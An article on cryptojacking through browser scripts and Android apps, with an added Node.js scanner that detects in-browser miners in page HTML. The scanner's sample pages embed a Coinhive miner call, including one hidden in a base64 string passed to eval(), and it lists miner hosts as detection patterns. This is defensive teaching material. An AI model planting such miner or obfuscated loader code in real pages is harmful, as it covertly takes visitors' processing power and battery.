Understanding cryptomining, a new malware variant

Last year, ransomware dominated security headlines worldwide, with the WannaCry and Petya attacks causing damage to many individuals and organizations.

With new variants appearing every day, malware has become fast, brutal and instantly disruptive. Advanced cyber criminals are now focused on cryptocurrencies: they covertly infect users' computers with software that does the calculations needed to generate cryptocurrency, that is, digital money such as Bitcoin, Monero and Ethereum that uses cryptography to secure online transactions without the need for banks. The crooks then keep any cryptocoin proceeds for themselves. This process is referred to as cryptomining (when it is done without the owner's consent it is also called cryptojacking).

They do this because making any real money with coinmining requires massive amounts of processing power, which slows down performance and wears hardware out. According to a Sophos article on cryptomining, unlike ransomware, cryptominers don't encrypt users' files; users can still access their data, which makes cryptomining sound fair compared to ransomware. However, infected computers will probably be annoyingly slow, the fans will be roaring all the time and battery life will run low.

These attacks can be more serious on mobile devices, where continuous heavy processor usage drains the battery and the resulting heat can cause permanent damage.

Until recently, cryptomining wasn't a problem because the activity was largely limited to those who chose to do it. That began to change as cryptocurrency prices skyrocketed: a single Bitcoin was worth $1,000 at the start of 2017 and around $17,000 by year's end. Cyber thieves took notice and started using cryptominers to make money.

For instance, JavaScript miners such as Coinhive's are embedded in websites and run in the browser, using visitors' CPUs to generate cryptocurrency for whoever planted the script. Users may notice poor performance, a spike in CPU usage and batteries draining faster than usual.

“Evolving malware continuously forces us to evolve our defences to try to close all attack vectors used by bad guys such as cryptominers, who take advantage of computing users and organizations,” says Harish Chib, VP of Middle East and Africa at Sophos. They do this because, to make any real money with coinmining, one needs a lot of electricity to deliver a lot of processing power on a lot of computers.

So they can either rent space in giant coinmining server farms, for example in Iceland, where electricity is cheap and the weather is cold enough to keep the computers from overheating, or steal other people's electricity, processing power and air conditioning by using malware to sneak cryptominers into their networks and browsers.

Legitimate cryptomining programs ask users for permission to run. Malicious versions don't, opting instead to quietly leech a computer's resources. SophosLabs is seeing more of the latter variety, with a new twist:

Increasingly, SophosLabs is seeing cryptominers designed to hide from users: instead of showing up as executable files, they take the form of scripts hidden on websites, mining for cryptocurrency in the browser. Without permission, these miners tap into the visitor's CPU and use the processing power to mine for digital currency. Visitors to these sites see no evidence of the mining; the only clues that something may be amiss are a computer slowing down and its fans revving up.
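The two passages above describe how browser miners are embedded and how they are hidden. The following is an added example, not code from the article or from Sophos: a small Node.js scanner that inspects a page's HTML for the indicators a practitioner would look for (script loaded from a known miner host, the Coinhive JavaScript API, the CryptoNight hash name, or WebAssembly plus a Web Worker) and also decodes base64 literals passed to atob() so that a miner hidden behind an eval() of an encoded string is still caught. The host and pattern lists are a short illustrative subset of real Coinhive-era indicators, not a complete blocklist, and the three sample pages, their URLs and the site key are constructed for the demo.

```javascript
// Added example: static scan of page HTML for in-browser cryptominer indicators.
// Not from the article; indicator lists are an illustrative subset. Run: node scan.js

// Hosts that historically served browser-mining libraries (coinhive.com served
// coinhive.min.js; authedmine.com was its opt-in variant; crypto-loot.com a competitor).
const MINER_HOSTS = ['coinhive.com', 'authedmine.com', 'crypto-loot.com'];

// Weighted patterns: the Coinhive API or its WebSocket proxy is conclusive,
// WebAssembly plus a Worker is only a weak hint (legitimate apps do that too).
const MINER_PATTERNS = [
  { name: 'coinhive-api', weight: 10, re: /\bCoinHive\.(Anonymous|User|Token)\b/ },
  { name: 'coinhive-websocket', weight: 10, re: /wss?:\/\/[^"'\s]*coinhive\.com/i },
  { name: 'cryptonight', weight: 6, re: /cryptonight/i },
  { name: 'wasm-plus-worker', weight: 3,
    re: /WebAssembly\.(instantiate|Module)[\s\S]*new\s+Worker|new\s+Worker[\s\S]*WebAssembly\.(instantiate|Module)/ },
];
const FLAG_THRESHOLD = 6; // one strong indicator flags; a lone weak hint does not

// Pull external script URLs and inline script bodies out of the HTML.
function extractScripts(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Hidden miners often keep their strings base64-encoded and decode them with
// atob(); return the decoded text of every literal atob("...") argument.
function decodeBase64Literals(code) {
  const out = [];
  const re = /atob\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g;
  let m;
  while ((m = re.exec(code)) !== null) out.push(Buffer.from(m[1], 'base64').toString('utf8'));
  return out;
}

// Hostname of a script src; relative paths resolve to a dummy host and never match.
function scriptHost(src) {
  try { return new URL(src, 'https://page.invalid/').hostname.toLowerCase(); } catch { return null; }
}

// Score the page: every distinct indicator counts once, across all scripts.
function scanPage(html) {
  const findings = [];
  const add = (name, weight, detail) => {
    if (!findings.some(f => f.name === name)) findings.push({ name, weight, detail });
  };
  for (const { src, body } of extractScripts(html)) {
    const host = src ? scriptHost(src) : null;
    if (host && MINER_HOSTS.some(h => host === h || host.endsWith('.' + h))) add('miner-host', 10, host);
    for (const text of [body, ...decodeBase64Literals(body)]) {
      for (const p of MINER_PATTERNS) if (p.re.test(text)) add(p.name, p.weight, src || 'inline');
    }
  }
  const score = findings.reduce((s, f) => s + f.weight, 0);
  return { flagged: score >= FLAG_THRESHOLD, score, findings };
}

// Constructed sample pages (site key and URLs are placeholders, not real accounts).
const PAGE_COINHIVE = `<html><body><h1>Free movies</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3}); miner.start();</script>
</body></html>`;

// Same miner, but the API call is hidden in a base64 blob and passed to eval().
const PAGE_OBFUSCATED = `<html><body><script>
var s = atob('${Buffer.from("new CoinHive.User('SITE_KEY_PLACEHOLDER','visitor').start()").toString('base64')}');
eval(s);</script></body></html>`;

// A legitimate WebAssembly app with a worker: weak signal only, must not be flagged.
const PAGE_BENIGN = `<html><body><script src="/app.js"></script>
<script>WebAssembly.instantiate(bytes).then(() => { new Worker('/physics.js'); });</script>
</body></html>`;

for (const [label, page] of [['coinhive', PAGE_COINHIVE], ['obfuscated', PAGE_OBFUSCATED], ['benign', PAGE_BENIGN]]) {
  const r = scanPage(page);
  console.log(label, r.flagged ? 'FLAGGED' : 'clean', 'score=' + r.score, r.findings.map(f => f.name).join(','));
}
```

The weak WebAssembly-plus-Worker signal is deliberately kept below the threshold so that games and media apps do not trip the scanner on their own. A static scan of this kind misses miners pulled in through iframes, scripts injected at runtime, and self-hosted copies with renamed symbols, so in practice it is paired with runtime signals (sustained high CPU from one tab, long-lived WebSocket connections) and a maintained filter list rather than used alone.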

Malicious miners are most typically hidden on third-party web pages and in Android apps. Bitcoin has been the currency of choice for the bad guys, but Monero is becoming a lot more popular: its CryptoNight proof-of-work is designed to run on ordinary CPUs, so hijacked desktops, browsers and phones can mine it competitively, whereas mining Bitcoin profitably requires specialised ASIC hardware that a commodity computer cannot keep up with. Monero transactions are also harder to trace, which suits criminals collecting the proceeds.

Ironically, a lot of coinmining software advises users not to bother running it on mobile phones, because the computing power of a mobile device isn't sufficient for decent results, so the costs outweigh the benefits. Well, the crooks don't care: since they pay for neither the hardware nor the electricity, any hash rate they steal is profit. A technical report published by SophosLabs describes how far they go: cybercriminals are willing to put a lot of effort into getting their cryptomining code accepted into the Google Play Store, and thus to have it "blessed" with Google's imprimatur.
